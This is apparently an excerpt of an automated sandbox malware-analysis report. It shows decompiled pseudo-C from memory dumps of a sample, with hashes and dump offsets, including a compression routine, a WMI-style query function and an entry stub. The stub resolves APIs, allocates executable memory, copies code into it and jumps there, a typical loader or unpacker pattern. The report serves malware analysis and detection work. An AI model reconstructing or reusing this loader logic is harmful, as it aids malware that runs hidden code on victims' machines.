    										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
    										_t75 = _t223 + 0x16bc; // 0x8b3c7e89
    										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
    										_t308 =  *_t75 + 0xfffffff0 + _t396;
    									}
    									_t388 = _v24;
    									 *(_t223 + 0x16bc) = _t308;
    									 *(_t223 + 0x16b8) = _t373;
    								}
    								_t80 = _t223 + 0xabc; // 0x5d0674c0
    								_t358 =  *_t80 & 0x0000ffff;
    								_t81 = _t223 + 0x16bc; // 0x8b3c7e89
    								_t402 =  *_t81;
    								_t82 = _t223 + 0xabe; // 0x4e95d06
    								_t245 =  *_t82 & 0x0000ffff;
    								_v24 = _t358;
    								_t84 = _t223 + 0x16b8; // 0xfffffe8b
    								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
    								_v28 = _t361;
    								if(_t402 > 0x10 - _t245) {
    									_t86 = _t223 + 0x14; // 0xc703f045
    									 *(_t223 + 0x16b8) = _t361;
    									_t88 = _t223 + 8; // 0x8d000040
    									 *((char*)( *_t88 +  *_t86)) = _v28;
    									_t223 = _a4;
    									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
    									_t94 = _t223 + 0x14; // 0xc703f045
    									_t95 = _t223 + 8; // 0x8d000040
    									_t96 = _t223 + 0x16b9; // 0x89fffffe
    									 *((char*)( *_t94 +  *_t95)) =  *_t96;
    									_t100 = _t223 + 0x16bc; // 0x8b3c7e89
    									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
    									_t361 = _v24 >> 0x10;
    									_t402 =  *_t100 + 0xfffffff0;
    								}
    								_t403 = _t402 + _t245;
    								_t362 = _t361 & 0x0000ffff;
    								 *(_t223 + 0x16bc) = _t403;
    								 *(_t223 + 0x16b8) = _t362;
    								_t363 = _t362 & 0x0000ffff;
    								if(_t403 <= 0xe) {
    									_t121 = _t403 + 2; // 0x8b3c7e8b
    									_t275 = _t121;
    									goto L28;
    								} else {
    									_t394 = _t388 + 0xfffffffd;
    									_t105 = _t223 + 0x14; // 0xc703f045
    									_t248 = _t394 << _t403 | _t363;
    									_t106 = _t223 + 8; // 0x8d000040
    									 *(_t223 + 0x16b8) = _t248;
    									 *( *_t106 +  *_t105) = _t248;
    									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
    									_t111 = _t223 + 0x14; // 0xc703f045
    									_t112 = _t223 + 8; // 0x8d000040
    									_t113 = _t223 + 0x16b9; // 0x89fffffe
    									 *((char*)( *_t111 +  *_t112)) =  *_t113;
    									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
    									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
    									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
    									goto L35;
    								}
    							} else {
    								_t316 = _t223 + (_t235 + 0x29f) * 4;
    								_v28 = _t316;
    								do {
    									_t378 = _a12;
    									_t22 = _t223 + 0x16bc; // 0x8b3c7e89
    									_t409 =  *_t22;
    									_t24 = _t378 * 4; // 0x238830a
    									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
    									_t379 =  *_t316 & 0x0000ffff;
    									_v24 = _t379;
    									_t27 = _t223 + 0x16b8; // 0xfffffe8b
    									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
    									_v20 = _t382;
    									if(_t409 <= 0x10 - _t250) {
    										_t321 = _t409 + _t250;
    									} else {
    										_t29 = _t223 + 0x14; // 0xc703f045
    										 *(_t223 + 0x16b8) = _t382;
    										_t31 = _t223 + 8; // 0x8d000040
    										 *((char*)( *_t31 +  *_t29)) = _v20;
    										_t223 = _a4;
    										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
    										_t37 = _t223 + 0x14; // 0xc703f045
    										_t38 = _t223 + 8; // 0x8d000040
    										_t39 = _t223 + 0x16b9; // 0x89fffffe
    										 *((char*)( *_t37 +  *_t38)) =  *_t39;
    										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
    										_t382 = _v24 >> 0x10;
    										_t45 = _t223 + 0x16bc; // 0x8b3c7e89
    										_t321 =  *_t45 + 0xfffffff0 + _t250;
    									}
    									 *(_t223 + 0x16bc) = _t321;
    									_t316 = _v28;
    									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
    									_t388 = _t388 - 1;
    								} while (_t388 != 0);
    								L35:
    								_t235 = _v8;
    								_t388 = 0;
    								_t398 = _a12;
    								if(_t235 != 0) {
    									if(_a8 != _t235) {
    										_t329 = 7;
    										_t217 = _t329 - 3; // 0x4
    										_t254 = _t217;
    									} else {
    										_t329 = 6;
    										_t216 = _t329 - 3; // 0x3
    										_t254 = _t216;
    									}
    								} else {
    									_t329 = 0x8a;
    									_t214 = _t388 + 3; // 0x3
    									_t254 = _t214;
    								}
    								goto L41;
    							}
    						}
    						_t223 = _a4;
    						if(_t235 == _v8) {
    							_t235 = _v8;
    							goto L41;
    						}
    						goto L4;
    						L41:
    						_v12 =  &(_v12[2]);
    						_t221 =  &_v16;
    						 *_t221 = _v16 - 1;
    					} while ( *_t221 != 0);
    					goto L42;
    				}
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
    • Instruction ID: 19ea4171ef540987915d0cec5eb8a46f3379abd3e1abe8683e611fa232c1fce7
    • Opcode Fuzzy Hash: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
    • Instruction Fuzzy Hash: EBF16E755092518FC709CF28C4948FA7BF1FF69310B1A82FDD8999B3A6D731A980CB91
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 59%
    			_entry_() {
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				void* _t256;
    				signed int _t257;
    				signed int _t260;
    				signed int _t264;
    				signed int _t266;
    				signed int _t267;
    				signed int _t268;
    				signed int _t271;
    				signed int _t275;
    				signed int _t277;
    				signed int _t278;
    				signed int _t280;
    				signed int _t281;
    				signed int _t282;
    				signed int _t283;
    				intOrPtr _t284;
    				signed int _t285;
    				signed int _t287;
    				intOrPtr* _t288;
    				void* _t290;
    				signed int _t291;
    				signed int _t293;
    				signed int _t295;
    				intOrPtr* _t296;
    				signed int _t297;
    				signed int _t299;
    				intOrPtr _t300;
    				intOrPtr _t301;
    				signed int _t302;
    				signed int _t304;
    				signed int _t305;
    				void* _t306;
    				signed int _t307;
    				int _t308;
    				signed int _t310;
    				signed int _t329;
    				void* _t355;
    				signed int _t356;
    				void* _t359;
    				signed int _t361;
    				signed int _t369;
    				signed int _t379;
    				void* _t381;
    				signed int _t384;
    				signed int _t395;
    				signed int _t398;
    				int* _t399;
    				signed int* _t400;
    
    				_push(0);
    				_t395 = _t398;
    				_t399 = _t398 + 0xfffffff4;
    				_t257 = E030944AB(_t256, _t306, _t307, _t329, _t355, _t379);
    				if(_t306 != _t257) {
    					if( *(_t306 + 0x4333d8) == 0) {
    						if( *(_t306 + 0x43384c) == 0) {
    							_t305 =  *((intOrPtr*)(_t306 + 0x435a38))();
    							_v12 = _t307;
    							 *(_t306 + 0x43384c) =  *(_t306 + 0x43384c) & 0x00000000;
    							 *(_t306 + 0x43384c) =  *(_t306 + 0x43384c) | _t307 ^ _v12 ^ _t305;
    							_t307 = _v12;
    						}
    						_push( *((intOrPtr*)(_t306 + 0x433490)));
    						if( *(_t306 + 0x43342c) == 0) {
    							_t304 =  *((intOrPtr*)(_t306 + 0x435a24))(_t306 + 0x43325c);
    							 *(_t306 + 0x43342c) =  *(_t306 + 0x43342c) & 0x00000000;
    							 *(_t306 + 0x43342c) =  *(_t306 + 0x43342c) ^ _t369 ^  *_t399 ^ _t304;
    							_t369 = _t369;
    						}
    						_push(0xffffffde);
    						if( *(_t306 + 0x4332f8) == 0) {
    							_t302 =  *((intOrPtr*)(_t306 + 0x435a34))();
    							 *(_t306 + 0x4332f8) =  *(_t306 + 0x4332f8) & 0x00000000;
    							 *(_t306 + 0x4332f8) =  *(_t306 + 0x4332f8) | _t329 & 0x00000000 ^ _t302;
    							_t329 = _t329;
    						}
    						_t257 =  *((intOrPtr*)(_t306 + 0x435a4c))(0xffffffff);
    						_v20 = _t329;
    						 *(_t306 + 0x4333d8) =  *(_t306 + 0x4333d8) & 0x00000000;
    						 *(_t306 + 0x4333d8) =  *(_t306 + 0x4333d8) | _t329 - _v20 ^ _t257;
    						_t329 = _v20;
    					}
    					_push(0x25);
    					if( *(_t306 + 0x43326c) == 0) {
    						_t257 =  *((intOrPtr*)(_t306 + 0x435a2c))();
    						_v12 = _t329;
    						 *(_t306 + 0x43326c) =  *(_t306 + 0x43326c) & 0x00000000;
    						 *(_t306 + 0x43326c) =  *(_t306 + 0x43326c) | _t329 & 0x00000000 | _t257;
    						_t329 = _v12;
    					}
    					_t290 = L03092E68(_t257, _t306, _t307, _t329, _t369);
    					_push(0x40);
    					_push(0x1000);
    					if( *((intOrPtr*)(_t306 + 0x433130)) == 0) {
    						_t301 =  *((intOrPtr*)(_t306 + 0x435a54))(0xea, _t307, _t290, 0x13, 0x400);
    						_v16 = _t379;
    						 *((intOrPtr*)(_t306 + 0x433130)) = _t301;
    						_t379 = _v16;
    					}
    					if( *(_t306 + 0x433304) == 0) {
    						if( *((intOrPtr*)(_t306 + 0x433344)) == 0) {
    							_t300 =  *((intOrPtr*)(_t306 + 0x435a2c))();
    							 *_t399 = _t369;
    							 *((intOrPtr*)(_t306 + 0x433344)) = _t300;
    							_t369 = 0;
    						}
    						_t296 = _t306 + 0x433730;
    						_push(_t296);
    						 *_t296 = 0x14;
    						if( *(_t306 + 0x433350) == 0) {
    							_t299 =  *((intOrPtr*)(_t306 + 0x435a30))(_t306 + 0x4330ec);
    							 *(_t306 + 0x433350) =  *(_t306 + 0x433350) & 0x00000000;
    							 *(_t306 + 0x433350) =  *(_t306 + 0x433350) | _t395 ^  *_t399 ^ _t299;
    							_t395 = _t395;
    						}
    						_t297 =  *((intOrPtr*)(_t306 + 0x435a50))();
    						 *_t399 = _t369;
    						 *(_t306 + 0x433304) = 0 ^ _t297;
    						_t369 = 0;
    					}
    					_push( *(_t306 + 0x433058));
    					_push(0);
    					if( *(_t306 + 0x4330d8) == 0) {
    						_t295 =  *((intOrPtr*)(_t306 + 0x435a5c))(0xffffffff,  *((intOrPtr*)(_t306 + 0x43337c)), 0xffffffff,  *((intOrPtr*)(_t306 + 0x433018)));
    						_push(_t369);
    						 *(_t306 + 0x4330d8) =  *(_t306 + 0x4330d8) & 0x00000000;
    						 *(_t306 + 0x4330d8) =  *(_t306 + 0x4330d8) | _t369 & 0x00000000 ^ _t295;
    					}
    					_t257 =  *((intOrPtr*)(_t306 + 0x435a10))();
    					if( *(_t306 + 0x43320c) == 0) {
    						if( *((intOrPtr*)(_t306 + 0x433658)) == 0) {
    							 *_t79 =  *((intOrPtr*)(_t306 + 0x435a3c))(_t257);
    							_push(_v12);
    							_pop( *_t81);
    							 *_t82 = 0;
    							_t257 = _v16;
    						}
    						_push(_t257);
    						_push( *((intOrPtr*)(_t306 + 0x4330d4)));
    						_push(0xffffffff);
    						_push(1);
    						if( *(_t306 + 0x43386c) == 0) {
    							_t293 =  *((intOrPtr*)(_t306 + 0x435a38))();
    							_v16 = _t329;
    							 *(_t306 + 0x43386c) =  *(_t306 + 0x43386c) & 0x00000000;
    							 *(_t306 + 0x43386c) =  *(_t306 + 0x43386c) ^ (_t329 & 0x00000000 | _t293);
    							_t329 = _v16;
    						}
    						_t291 =  *((intOrPtr*)(_t306 + 0x435a4c))();
    						_v12 = _t307;
    						 *(_t306 + 0x43320c) =  *(_t306 + 0x43320c) & 0x00000000;
    						 *(_t306 + 0x43320c) =  *(_t306 + 0x43320c) | _t307 & 0x00000000 | _t291;
    						_t307 = _v12;
    						if( *(_t306 + 0x4338e4) == 0) {
    							_t291 =  *((intOrPtr*)(_t306 + 0x435a2c))();
    							 *_t399 = _t329;
    							 *(_t306 + 0x4338e4) = 0 ^ _t291;
    							_t329 = 0;
    						}
    						_t257 = _t291 & 0x00000000 ^  *_t399;
    						_t399 = _t399 - 0xfffffffc;
    					}
    				}
    				 *_t103 = _t257;
    				_push(_v16);
    				_pop(_t356);
    				 *_t399 = _t257;
    				 *(_t306 + 0x433154) = _t356;
    				_t260 = 0;
    				if( *(_t306 + 0x433780) == 0) {
    					_t260 =  *((intOrPtr*)(_t306 + 0x435a28))(_t306 + 0x43330c);
    					 *_t399 = _t329;
    					 *(_t306 + 0x433780) = 0 ^ _t260;
    					_t329 = 0;
    				}
    				if(_t306 > 0) {
    					if( *(_t306 + 0x43322c) == 0) {
    						_t288 = _t306 + 0x4335e8;
    						 *_t288 = 0x14;
    						_t260 =  *((intOrPtr*)(_t306 + 0x435a50))(_t288);
    						_v20 = _t356;
    						 *(_t306 + 0x43322c) =  *(_t306 + 0x43322c) & 0x00000000;
    						 *(_t306 + 0x43322c) =  *(_t306 + 0x43322c) | _t356 & 0x00000000 | _t260;
    						_t356 = _v20;
    					}
    					if( *(_t306 + 0x4332a8) == 0) {
    						if( *(_t306 + 0x433610) == 0) {
    							_t287 =  *((intOrPtr*)(_t306 + 0x435a28))(_t306 + 0x433284);
    							_v16 = _t307;
    							 *(_t306 + 0x433610) =  *(_t306 + 0x433610) & 0x00000000;
    							 *(_t306 + 0x433610) =  *(_t306 + 0x433610) ^ (_t307 & 0x00000000 | _t287);
    							_t307 = _v16;
    						}
    						_t282 = _t306 + 0x4334cc;
    						if( *(_t306 + 0x433420) == 0) {
    							_t285 =  *((intOrPtr*)(_t306 + 0x435a60))();
    							 *_t399 = _t307;
    							 *(_t306 + 0x433420) = 0 ^ _t285;
    							_t307 = 0;
    							 *_t133 = _t282;
    							_t282 = _v20;
    						}
    						_push(_t282);
    						if( *((intOrPtr*)(_t306 + 0x4334a4)) == 0) {
    							_t284 =  *((intOrPtr*)(_t306 + 0x435a4c))( *((intOrPtr*)(_t306 + 0x43370c)), _t307, 1);
    							_v12 = _t329;
    							 *((intOrPtr*)(_t306 + 0x4334a4)) = _t284;
    							_t329 = _v12;
    						}
    						_t260 =  *((intOrPtr*)(_t306 + 0x435a20))();
    						if( *(_t306 + 0x4334e4) == 0) {
    							_t283 =  *((intOrPtr*)(_t306 + 0x435a58))();
    							 *(_t306 + 0x4334e4) =  *(_t306 + 0x4334e4) & 0x00000000;
    							 *(_t306 + 0x4334e4) =  *(_t306 + 0x4334e4) ^ _t379 & 0x00000000 ^ _t283;
    							_t379 = _t379;
    							 *_t148 = _t260;
    							_t260 = _v20;
    						}
    						_v12 = _t329;
    						 *(_t306 + 0x4332a8) =  *(_t306 + 0x4332a8) & 0x00000000;
    						 *(_t306 + 0x4332a8) =  *(_t306 + 0x4332a8) | _t329 & 0x00000000 ^ _t260;
    						_t329 = _v12;
    					}
    					 *(_t306 + 0x433150) =  *(_t306 + 0x433150) + _t306;
    					 *((intOrPtr*)(_t306 + 0x433010)) =  *((intOrPtr*)(_t306 + 0x433010)) + _t306;
    					if( *(_t306 + 0x43339c) == 0) {
    						_t260 =  *((intOrPtr*)(_t306 + 0x435a64))( *((intOrPtr*)(_t306 + 0x433024)), 0, 8);
    						 *(_t306 + 0x43339c) =  *(_t306 + 0x43339c) & 0x00000000;
    						 *(_t306 + 0x43339c) =  *(_t306 + 0x43339c) ^ _t329 & 0x00000000 ^ _t260;
    						_t329 = _t329;
    					}
    				}
    				_v20 = _t260;
    				_t381 = _t379 & 0x00000000 ^ (_t260 ^ _v20 |  *(_t306 + 0x433150));
    				if( *(_t306 + 0x4338d8) == 0) {
    					_t281 =  *((intOrPtr*)(_t306 + 0x435a34))();
    					_v12 = _t381;
    					 *(_t306 + 0x4338d8) = 0 ^ _t281;
    					_t381 = _v12;
    				}
    				if( *(_t306 + 0x4338f0) == 0) {
    					if( *(_t306 + 0x4337ac) == 0) {
    						_t280 =  *((intOrPtr*)(_t306 + 0x435a64))(0xffffffff, 0,  *((intOrPtr*)(_t306 + 0x43363c)));
    						_v20 = _t307;
    						 *(_t306 + 0x4337ac) = 0 ^ _t280;
    						_t307 = _v20;
    					}
    					_t277 =  *((intOrPtr*)(_t306 + 0x435a24))(_t306 + 0x4332e8);
    					if( *(_t306 + 0x433328) == 0) {
    						_t278 =  *((intOrPtr*)(_t306 + 0x435a38))(_t277);
    						_v20 = _t307;
    						 *(_t306 + 0x433328) =  *(_t306 + 0x433328) & 0x00000000;
    						 *(_t306 + 0x433328) =  *(_t306 + 0x433328) ^ (_t307 & 0x00000000 | _t278);
    						_t277 =  *_t399;
    						_t399 =  &(_t399[1]);
    					}
    					 *(_t306 + 0x4338f0) =  *(_t306 + 0x4338f0) & 0x00000000;
    					 *(_t306 + 0x4338f0) =  *(_t306 + 0x4338f0) ^ (_t329 ^  *_t399 | _t277);
    					_t329 = _t329;
    				}
    				_v16 = _t356;
    				_t308 =  *(_t306 + 0x433058);
    				_t359 = _v16;
    				if( *(_t306 + 0x433638) == 0) {
    					_t275 =  *((intOrPtr*)(_t306 + 0x435a20))(_t306 + 0x433048, _t308);
    					 *(_t306 + 0x433638) =  *(_t306 + 0x433638) & 0x00000000;
    					 *(_t306 + 0x433638) =  *(_t306 + 0x433638) | _t359 ^  *_t399 | _t275;
    					_t359 = _t359;
    					_t308 =  *_t399;
    					_t399 = _t399 - 0xfffffffc;
    				}
    				asm("cld");
    				_t264 = memcpy(_t359, _t381, _t308);
    				_t400 =  &(_t399[3]);
    				_t361 = _t381 + _t308 + _t308;
    				 *_t400 = 0xfffff;
    				_t310 = _t395;
    				if( *(_t306 + 0x433094) == 0) {
    					_t264 =  *((intOrPtr*)(_t306 + 0x435a24))(_t306 + 0x4331b8, _t310);
    					_v20 = _t361;
    					 *(_t306 + 0x433094) =  *(_t306 + 0x433094) & 0x00000000;
    					 *(_t306 + 0x433094) =  *(_t306 + 0x433094) | _t361 - _v20 ^ _t264;
    					_pop( *_t217);
    					_t310 = _v20;
    				}
    				_v20 = _t381;
    				_t266 = _t264 & 0x00000000 ^ _t381 - _v20 ^  *(_t306 + 0x433154);
    				_t384 = _v20;
    				_push(0x402037);
    				if( *(_t306 + 0x43374c) == 0) {
    					_t271 =  *((intOrPtr*)(_t306 + 0x435a24))(_t306 + 0x433464, _t310, _t266);
    					_v12 = _t384;
    					 *(_t306 + 0x43374c) =  *(_t306 + 0x43374c) & 0x00000000;
    					 *(_t306 + 0x43374c) =  *(_t306 + 0x43374c) | _t384 - _v12 | _t271;
    					_t310 =  *_t400;
    					_t400 = _t400 - 0xfffffffc;
    					_pop( *_t233);
    					_t266 = 0 ^ _v20;
    				}
    				_pop( *_t235);
    				 *(_t306 + 0x4338e8) =  *(_t306 + 0x4338e8) & _t310;
    				if( *(_t306 + 0x433390) == 0) {
    					_t268 =  *((intOrPtr*)(_t306 + 0x435a4c))(0xffffffff, 1, 1, _t266);
    					_v20 = _t329;
    					 *(_t306 + 0x433390) = _t268;
    					_t329 = _v20;
    					_t266 = (_t268 & 0x00000000) +  *_t400;
    					_t400 = _t400 - 0xfffffffc;
    				}
    				 *(_t306 + 0x4338e8) =  *(_t306 + 0x4338e8) + _t266;
    				if( *(_t306 + 0x433494) == 0) {
    					_t267 =  *((intOrPtr*)(_t306 + 0x435a54))(0, 0xffffffff, 0xffffffff, _t400,  *((intOrPtr*)(_t306 + 0x4330a4)));
    					_v16 = _t329;
    					 *(_t306 + 0x433494) =  *(_t306 + 0x433494) & 0x00000000;
    					 *(_t306 + 0x433494) =  *(_t306 + 0x433494) | _t329 ^ _v16 ^ _t267;
    				}
    				goto ( *(_t306 + 0x4338e8));
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.696598027.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: true
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 52fd33336dbd82e60881b9d9d050ede990fd1616c71584f06ddeacaa9d7abf3e
    • Instruction ID: 8fb171b4085a8ca3c33556b236a9e516795c191843abd4c6b4598b0098c13e9d
    • Opcode Fuzzy Hash: 52fd33336dbd82e60881b9d9d050ede990fd1616c71584f06ddeacaa9d7abf3e
    • Instruction Fuzzy Hash: C4C16D71901204EFFF04DFA0C98A75977F5EF64326F18A1AADC1D9E18AC77812949F28
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 4898b2f6636ec9399df3118190717501385b1dd4ee858edb0113bdee0a687807
    • Instruction ID: d0537c4036237f79035386642b2d4391bf8eddd9ec583022d2bb6d93bec1c8e2
    • Opcode Fuzzy Hash: 4898b2f6636ec9399df3118190717501385b1dd4ee858edb0113bdee0a687807
    • Instruction Fuzzy Hash: FA7135B56205758FE708CF29DCD04653392E78A301787C52DEA628B3D5C635E727CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: a58130296ee3e9968078918e0219af3fba735cb18b38036d537aa5c1a1c7b3f2
    • Instruction ID: efea62cd03dbdba979b5781a3b5613bf4c799b2b78296d361690321e43073893
    • Opcode Fuzzy Hash: a58130296ee3e9968078918e0219af3fba735cb18b38036d537aa5c1a1c7b3f2
    • Instruction Fuzzy Hash: 1C5168B3B041B00BDF5CCE3D8C642797ED25AC505670EC2BAE9A9CF24AE878C7059760
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
    • Instruction ID: 93a3b517362ed5b43e545c9aefd21cc253981a7e3f3aaacb38cfda22b24e6f30
    • Opcode Fuzzy Hash: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
    • Instruction Fuzzy Hash: 8C2162766154128BD35CDF2CD8A6A69F3A5FB48310F45427ED51BCB682CB71E492CB80
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 50%
    			E1000DB47(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				char _v24;
    				void* _v28;
    				signed int _v32;
    				char _v36;
    				intOrPtr _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr _v56;
    				signed int _v60;
    				char* _v72;
    				signed short _v80;
    				signed int _v84;
    				char _v88;
    				char _v92;
    				char _v96;
    				intOrPtr _v100;
    				char _v104;
    				char _v616;
    				intOrPtr* _t159;
    				char _t165;
    				signed int _t166;
    				signed int _t173;
    				signed int _t178;
    				signed int _t186;
    				intOrPtr* _t187;
    				signed int _t188;
    				signed int _t192;
    				intOrPtr* _t193;
    				intOrPtr _t200;
    				intOrPtr* _t205;
    				signed int _t207;
    				signed int _t209;
    				intOrPtr* _t210;
    				intOrPtr _t212;
    				intOrPtr* _t213;
    				signed int _t214;
    				char _t217;
    				signed int _t218;
    				signed int _t219;
    				signed int _t230;
    				signed int _t235;
    				signed int _t242;
    				signed int _t243;
    				signed int _t244;
    				signed int _t245;
    				intOrPtr* _t247;
    				intOrPtr* _t251;
    				signed int _t252;
    				intOrPtr* _t253;
    				void* _t255;
    				intOrPtr* _t261;
    				signed int _t262;
    				signed int _t283;
    				signed int _t289;
    				char* _t298;
    				void* _t320;
    				signed int _t322;
    				intOrPtr* _t323;
    				intOrPtr _t324;
    				signed int _t327;
    				intOrPtr* _t328;
    				intOrPtr* _t329;
    
    				_v32 = _v32 & 0x00000000;
    				_v60 = _v60 & 0x00000000;
    				_v56 = __edx;
    				_v100 = __ecx;
    				_t159 = E1000D52E(__ecx);
    				_t251 = _t159;
    				_v104 = _t251;
    				if(_t251 == 0) {
    					return _t159;
    				}
    				_t320 = E100085EA(0x10);
    				_v36 = _t320;
    				_pop(_t255);
    				if(_t320 == 0) {
    					L53:
    					E10008600( &_v60, 0xfffffffe);
    					E1000D5E2( &_v104);
    					return _t320;
    				}
    				_t165 = E100095C7(_t255, 0x536);
    				 *_t328 = 0x609;
    				_v52 = _t165;
    				_t166 = E100095C7(_t255);
    				_push(0);
    				_push(_v56);
    				_v20 = _t166;
    				_push(_t166);
    				_push(_a4);
    				_t322 = E100092CB(_t165);
    				_v60 = _t322;
    				E100085BB( &_v52);
    				E100085BB( &_v20);
    				_t329 = _t328 + 0x20;
    				if(_t322 != 0) {
    					_t323 = __imp__#2;
    					_v40 =  *_t323(_t322);
    					_t173 = E100095C7(_t255, 0x9e4);
    					_v20 = _t173;
    					_v52 =  *_t323(_t173);
    					E100085BB( &_v20);
    					_t324 = _v40;
    					_t261 =  *_t251;
    					_t252 = 0;
    					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
    					__eflags = _t178;
    					if(_t178 != 0) {
    						L52:
    						__imp__#6(_t324);
    						__imp__#6(_v52);
    						goto L53;
    					}
    					_t262 = _v32;
    					_v28 = 0;
    					_v20 = 0;
    					__eflags = _t262;
    					if(_t262 == 0) {
    						L49:
    						 *((intOrPtr*)( *_t262 + 8))(_t262);
    						__eflags = _t252;
    						if(_t252 == 0) {
    							E10008600( &_v36, 0);
    							_t320 = _v36;
    						} else {
    							 *(_t320 + 8) = _t252;
    							 *_t320 = E100091C9(_v100);
    							 *((intOrPtr*)(_t320 + 4)) = E100091C9(_v56);
    						}
    						goto L52;
    					} else {
    						goto L6;
    					}
    					while(1) {
    						L6:
    						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
    						__eflags = _t186;
    						if(_t186 != 0) {
    							break;
    						}
    						_v16 = 0;
    						_v48 = 0;
    						_v12 = 0;
    						_v24 = 0;
    						__eflags = _v84;
    						if(_v84 == 0) {
    							break;
    						}
    						_t187 = _v28;
    						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
    						__eflags = _t188;
    						if(_t188 >= 0) {
    							__imp__#20(_v24, 1,  &_v16);
    							__imp__#19(_v24, 1,  &_v48);
    							_t46 = _t320 + 0xc; // 0xc
    							_t253 = _t46;
    							_t327 = _t252 << 3;
    							_t47 = _t327 + 8; // 0x8
    							_t192 = E1000867E(_t327, _t47);
    							__eflags = _t192;
    							if(_t192 == 0) {
    								__imp__#16(_v24);
    								_t193 = _v28;
    								 *((intOrPtr*)( *_t193 + 8))(_t193);
    								L46:
    								_t252 = _v20;
    								break;
    							}
    							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
    							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E100085EA( *(_t327 +  *_t253) << 3);
    							_t200 =  *_t253;
    							__eflags =  *(_t327 + _t200 + 4);
    							if( *(_t327 + _t200 + 4) == 0) {
    								_t136 = _t320 + 0xc; // 0xc
    								E10008600(_t136, 0);
    								E10008600( &_v36, 0);
    								__imp__#16(_v24);
    								_t205 = _v28;
    								 *((intOrPtr*)( *_t205 + 8))(_t205);
    								_t320 = _v36;
    								goto L46;
    							}
    							_t207 = _v16;
    							while(1) {
    								_v12 = _t207;
    								__eflags = _t207 - _v48;
    								if(_t207 > _v48) {
    									break;
    								}
    								_v44 = _v44 & 0x00000000;
    								_t209 =  &_v12;
    								__imp__#25(_v24, _t209,  &_v44);
    								__eflags = _t209;
    								if(_t209 < 0) {
    									break;
    								}
    								_t212 = E100091C9(_v44);
    								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
    								_t213 = _v28;
    								_t281 =  *_t213;
    								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
    								__eflags = _t214;
    								if(_t214 < 0) {
    									L39:
    									__imp__#6(_v44);
    									_t207 = _v12 + 1;
    									__eflags = _t207;
    									continue;
    								}
    								_v92 = E100095C7(_t281, 0x250);
    								 *_t329 = 0x4cc;
    								_t217 = E100095C7(_t281);
    								_t283 = _v80;
    								_v96 = _t217;
    								_t218 = _t283 & 0x0000ffff;
    								__eflags = _t218 - 0xb;
    								if(__eflags > 0) {
    									_t219 = _t218 - 0x10;
    									__eflags = _t219;
    									if(_t219 == 0) {
    										L35:
    										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E100085EA(0x18);
    										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
    										__eflags = _t289;
    										if(_t289 == 0) {
    											L38:
    											E100085BB( &_v92);
